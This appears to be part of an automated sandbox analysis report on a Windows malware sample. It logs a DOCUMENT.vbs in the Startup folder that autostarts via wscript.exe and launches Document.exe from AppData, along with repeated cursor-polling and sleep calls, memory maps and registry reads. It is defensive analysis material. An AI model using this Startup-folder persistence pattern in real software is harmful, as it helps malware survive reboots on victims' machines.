Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetLayeredWindowAttributes, address_out = 0x7785ec88	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 255	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	2	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 523	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn

Process #13: wscript.exe

92

0

»

Information	Value
ID	#13
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:53, Reason: Autostart
Unmonitor	End Time: 00:05:11, Reason: Self Terminated
Monitor Duration	00:00:18

OS Process Information

»

Information	Value
PID	0x568
Parent PID	0x46c (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 56C 0x 5C0 0x 5D4 0x 61C 0x 658 0x 6D0 0x 6D8 0x 6E0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
locale.nls	0x00040000	0x000a6fff	Memory Mapped File	r	-
private_0x00000000000b0000	0x000b0000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	rw	-
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x001d0fff	Private Memory	rw	-
wscript.exe	0x001e0000	0x001e5fff	Memory Mapped File	r	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
rpcss.dll	0x002f0000	0x0036cfff	Memory Mapped File	r	-
pagefile_0x00000000002f0000	0x002f0000	0x003cefff	Pagefile Backed Memory	r	-
pagefile_0x00000000003d0000	0x003d0000	0x003d0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003e0000	0x003e0000	0x003e0fff	Pagefile Backed Memory	r	-
document.vbs	0x003f0000	0x003f0fff	Memory Mapped File	r	-
rsaenh.dll	0x003f0000	0x00434fff	Memory Mapped File	r	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rw	-
document.vbs	0x00400000	0x00400fff	Memory Mapped File	r	... Region Actions Download Dump
wshom.ocx	0x00400000	0x00413fff	Memory Mapped File	r	-
pagefile_0x0000000000420000	0x00420000	0x00420fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000430000	0x00430000	0x00431fff	Pagefile Backed Memory	r	-
private_0x0000000000440000	0x00440000	0x0044ffff	Private Memory	rw	-
private_0x0000000000450000	0x00450000	0x0049ffff	Private Memory	rw	-
cversions.2.db	0x00450000	0x00453fff	Memory Mapped File	r	-
pagefile_0x0000000000460000	0x00460000	0x00461fff	Pagefile Backed Memory	r	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db	0x00470000	0x0048ffff	Memory Mapped File	r	-
private_0x0000000000490000	0x00490000	0x0049ffff	Private Memory	rw	-
pagefile_0x00000000004a0000	0x004a0000	0x004a0fff	Pagefile Backed Memory	rw	-
cversions.2.db	0x004b0000	0x004b3fff	Memory Mapped File	r	-
private_0x00000000004c0000	0x004c0000	0x005bffff	Private Memory	rw	-
pagefile_0x00000000005c0000	0x005c0000	0x00747fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000750000	0x00750000	0x008d0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000008e0000	0x008e0000	0x01cdffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001ce0000	0x01ce0000	0x02022fff	Pagefile Backed Memory	r	-
private_0x0000000002030000	0x02030000	0x021bffff	Private Memory	rw	-
private_0x0000000002030000	0x02030000	0x0212ffff	Private Memory	rw	-
pagefile_0x0000000002130000	0x02130000	0x02130fff	Pagefile Backed Memory	rw	-
private_0x0000000002140000	0x02140000	0x021bffff	Private Memory	rw	-
private_0x00000000021c0000	0x021c0000	0x022bffff	Private Memory	rw	-
private_0x00000000022e0000	0x022e0000	0x023dffff	Private Memory	rw	-
sortdefault.nls	0x023e0000	0x026aefff	Memory Mapped File	r	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db	0x026b0000	0x026dffff	Memory Mapped File	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x026e0000	0x02745fff	Memory Mapped File	r	-
private_0x00000000027a0000	0x027a0000	0x0289ffff	Private Memory	rw	-
pagefile_0x00000000028a0000	0x028a0000	0x0389ffff	Pagefile Backed Memory	rw	-
private_0x00000000038a0000	0x038a0000	0x0399ffff	Private Memory	rw	-
private_0x0000000003b60000	0x03b60000	0x03c5ffff	Private Memory	rw	-
private_0x0000000003cd0000	0x03cd0000	0x03dcffff	Private Memory	rw	-
pagefile_0x0000000003dd0000	0x03dd0000	0x041c2fff	Pagefile Backed Memory	r	-
private_0x00000000042a0000	0x042a0000	0x0439ffff	Private Memory	rw	-
user32.dll	0x77100000	0x771f9fff	Memory Mapped File	rwx	-
kernel32.dll	0x77200000	0x7731efff	Memory Mapped File	rwx	-
ntdll.dll	0x77320000	0x774c8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
wscript.exe	0xffe70000	0xffe9bfff	Memory Mapped File	rwx	-
scrrun.dll	0x7fef5c40000	0x7fef5c73fff	Memory Mapped File	rwx	-
wshom.ocx	0x7fef5c80000	0x7fef5ca7fff	Memory Mapped File	rwx	-
scrobj.dll	0x7fef5ec0000	0x7fef5efbfff	Memory Mapped File	rwx	-
comctl32.dll	0x7fef6150000	0x7fef61effff	Memory Mapped File	rwx	-
wshext.dll	0x7fef7320000	0x7fef733cfff	Memory Mapped File	rwx	-
msisip.dll	0x7fef7440000	0x7fef744afff	Memory Mapped File	rwx	-
vbscript.dll	0x7fef77c0000	0x7fef7859fff	Memory Mapped File	rwx	-
shdocvw.dll	0x7fef8550000	0x7fef8583fff	Memory Mapped File	rwx	-
apphelp.dll	0x7fefa5c0000	0x7fefa616fff	Memory Mapped File	rwx	-
mpr.dll	0x7fefa7f0000	0x7fefa807fff	Memory Mapped File	rwx	-
dwmapi.dll	0x7fefaf70000	0x7fefaf87fff	Memory Mapped File	rwx	-
uxtheme.dll	0x7fefb350000	0x7fefb3a5fff	Memory Mapped File	rwx	-
comctl32.dll	0x7fefbb80000	0x7fefbd73fff	Memory Mapped File	rwx	-
ntmarta.dll	0x7fefbfd0000	0x7fefbffcfff	Memory Mapped File	rwx	-
propsys.dll	0x7fefc030000	0x7fefc15bfff	Memory Mapped File	rwx	-
version.dll	0x7fefc430000	0x7fefc43bfff	Memory Mapped File	rwx	-
rsaenh.dll	0x7fefc860000	0x7fefc8a6fff	Memory Mapped File	rwx	-
cryptsp.dll	0x7fefcb80000	0x7fefcb96fff	Memory Mapped File	rwx	-
sspicli.dll	0x7fefd130000	0x7fefd154fff	Memory Mapped File	rwx	-
cryptbase.dll	0x7fefd160000	0x7fefd16efff	Memory Mapped File	rwx	-
sxs.dll	0x7fefd170000	0x7fefd200fff	Memory Mapped File	rwx	-
profapi.dll	0x7fefd270000	0x7fefd27efff	Memory Mapped File	rwx	-
msasn1.dll	0x7fefd310000	0x7fefd31efff	Memory Mapped File	rwx	-
wintrust.dll	0x7fefd320000	0x7fefd359fff	Memory Mapped File	rwx	-
devobj.dll	0x7fefd360000	0x7fefd379fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefd380000	0x7fefd3eafff	Memory Mapped File	rwx	-
crypt32.dll	0x7fefd490000	0x7fefd5f6fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x7fefd600000	0x7fefd635fff	Memory Mapped File	rwx	-
oleaut32.dll	0x7fefd640000	0x7fefd716fff	Memory Mapped File	rwx	-
wininet.dll	0x7fefd720000	0x7fefd849fff	Memory Mapped File	rwx	-
urlmon.dll	0x7fefd850000	0x7fefd9c7fff	Memory Mapped File	rwx	-
lpk.dll	0x7fefd9d0000	0x7fefd9ddfff	Memory Mapped File	rwx	-
clbcatq.dll	0x7fefd9e0000	0x7fefda78fff	Memory Mapped File	rwx	-
usp10.dll	0x7fefda80000	0x7fefdb48fff	Memory Mapped File	rwx	-
comdlg32.dll	0x7fefdb50000	0x7fefdbe6fff	Memory Mapped File	rwx	-
shell32.dll	0x7fefdc00000	0x7fefe987fff	Memory Mapped File	rwx	-
wldap32.dll	0x7fefe990000	0x7fefe9e1fff	Memory Mapped File	rwx	-
ole32.dll	0x7fefe9f0000	0x7fefebf2fff	Memory Mapped File	rwx	-
msctf.dll	0x7fefecd0000	0x7fefedd8fff	Memory Mapped File	rwx	-
iertutil.dll	0x7fefede0000	0x7feff038fff	Memory Mapped File	rwx	-
sechost.dll	0x7feff060000	0x7feff07efff	Memory Mapped File	rwx	-
advapi32.dll	0x7feff080000	0x7feff15afff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff160000	0x7feff1fefff	Memory Mapped File	rwx	-
rpcrt4.dll	0x7feff200000	0x7feff32cfff	Memory Mapped File	rwx	-
imm32.dll	0x7feff330000	0x7feff35dfff	Memory Mapped File	rwx	-
setupapi.dll	0x7feff360000	0x7feff536fff	Memory Mapped File	rwx	-
gdi32.dll	0x7feff540000	0x7feff5a6fff	Memory Mapped File	rwx	-
shlwapi.dll	0x7feff5b0000	0x7feff620fff	Memory Mapped File	rwx	-
apisetschema.dll	0x7feff640000	0x7feff640fff	Memory Mapped File	rwx	-
private_0x000007fffffaa000	0x7fffffaa000	0x7fffffabfff	Private Memory	rw	-
private_0x000007fffffac000	0x7fffffac000	0x7fffffadfff	Private Memory	rw	-
private_0x000007fffffae000	0x7fffffae000	0x7fffffaffff	Private Memory	rw	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffd4000	0x7fffffd4000	0x7fffffd5fff	Private Memory	rw	-
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd7fff	Private Memory	rw	-
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	rw	-
private_0x000007fffffda000	0x7fffffda000	0x7fffffdbfff	Private Memory	rw	-
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffdcfff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0x56c

91

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-05 09:32:20 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 27066	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffe70000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77200000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7721c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.vbs	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.vbs, data = VBSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\VBSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\VBSFile\ScriptEngine, data = VBScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2018-11-05 09:32:22 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 29203	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefe9f0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea17490	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 29998	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, protection = PAGE_READONLY, maximum_size = 141	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = õ.	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7feff080000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7feff09e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7feff09f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7feff09f660	1	Fn
System	Get Time	type = System Time, time = 2018-11-05 09:32:28 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 35037	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, size = 141, size_out = 141	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2018-11-05 09:32:30 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 36395	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefe9f0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea0a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = wsCripT.ShEll	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea22e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2018-11-05 09:32:32 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 38828	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffe70000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xffe7d7f8	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x7fefdc00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x7fefdc27c70	1	Fn
Process	Create	process_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, show_window = SW_SHOWNORMAL	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x5d4

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 4479568		1	Fn

Process #14: document.exe

66

0

»

Information	Value
ID	#14
File Name	c:\users\aetadzjz\appdata\roaming\document\document.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:05:10, Reason: Child Process
Unmonitor	End Time: 00:05:21, Reason: Terminated by Timeout
Monitor Duration	00:00:11

OS Process Information

»

Information	Value
PID	0x6ec
Parent PID	0x568 (c:\windows\system32\wscript.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 6F0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	rw	-
private_0x0000000000220000	0x00220000	0x0025ffff	Private Memory	rw	-
private_0x0000000000260000	0x00260000	0x00260fff	Private Memory	rwx	-
pagefile_0x0000000000270000	0x00270000	0x00276fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000280000	0x00280000	0x00281fff	Pagefile Backed Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x0036ffff	Private Memory	rw	-
document.exe	0x00400000	0x004b2fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000004c0000	0x004c0000	0x005bffff	Private Memory	-	-
private_0x00000000005f0000	0x005f0000	0x005fffff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0070ffff	Private Memory	rw	-
pagefile_0x0000000000710000	0x00710000	0x00897fff	Pagefile Backed Memory	r	-
pagefile_0x00000000008a0000	0x008a0000	0x00a20fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000a30000	0x00a30000	0x01e2ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001e30000	0x01e30000	0x01f0efff	Pagefile Backed Memory	r	-
private_0x0000000001f10000	0x01f10000	0x0212ffff	Private Memory	rw	-
staticcache.dat	0x02130000	0x02a5ffff	Memory Mapped File	r	-
pagefile_0x0000000002a60000	0x02a60000	0x02e52fff	Pagefile Backed Memory	r	-
private_0x0000000002e60000	0x02e60000	0x2478ffff	Private Memory	-	-
dwmapi.dll	0x739f0000	0x73a02fff	Memory Mapped File	rwx	-
uxtheme.dll	0x73a10000	0x73a8ffff	Memory Mapped File	rwx	-
comctl32.dll	0x73b80000	0x73c03fff	Memory Mapped File	rwx	-
version.dll	0x73c10000	0x73c18fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x73c30000	0x73c37fff	Memory Mapped File	rwx	-
wow64win.dll	0x73c40000	0x73c9bfff	Memory Mapped File	rwx	-
wow64.dll	0x73ca0000	0x73cdefff	Memory Mapped File	rwx	-
cryptbase.dll	0x75050000	0x7505bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75060000	0x750bffff	Memory Mapped File	rwx	-
ole32.dll	0x750f0000	0x7524bfff	Memory Mapped File	rwx	-
advapi32.dll	0x75250000	0x752effff	Memory Mapped File	rwx	-
rpcrt4.dll	0x753f0000	0x754dffff	Memory Mapped File	rwx	-
shell32.dll	0x754e0000	0x76129fff	Memory Mapped File	rwx	-
user32.dll	0x76130000	0x7622ffff	Memory Mapped File	rwx	-
lpk.dll	0x76230000	0x76239fff	Memory Mapped File	rwx	-
kernel32.dll	0x764a0000	0x765affff	Memory Mapped File	rwx	-
oleaut32.dll	0x76640000	0x766cefff	Memory Mapped File	rwx	-
sechost.dll	0x766d0000	0x766e8fff	Memory Mapped File	rwx	-
kernelbase.dll	0x766f0000	0x76735fff	Memory Mapped File	rwx	-
comdlg32.dll	0x76740000	0x767bafff	Memory Mapped File	rwx	-
imm32.dll	0x76ca0000	0x76cfffff	Memory Mapped File	rwx	-
msctf.dll	0x76df0000	0x76ebbfff	Memory Mapped File	rwx	-
msvcrt.dll	0x76ec0000	0x76f6bfff	Memory Mapped File	rwx	-
shlwapi.dll	0x76f70000	0x76fc6fff	Memory Mapped File	rwx	-
usp10.dll	0x76fd0000	0x7706cfff	Memory Mapped File	rwx	-
gdi32.dll	0x77070000	0x770fffff	Memory Mapped File	rwx	-
private_0x0000000077100000	0x77100000	0x771f9fff	Private Memory	rwx	-
private_0x0000000077200000	0x77200000	0x7731efff	Private Memory	rwx	-
ntdll.dll	0x77320000	0x774c8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77500000	0x7767ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Threads

Thread 0x6f0

66

0

»

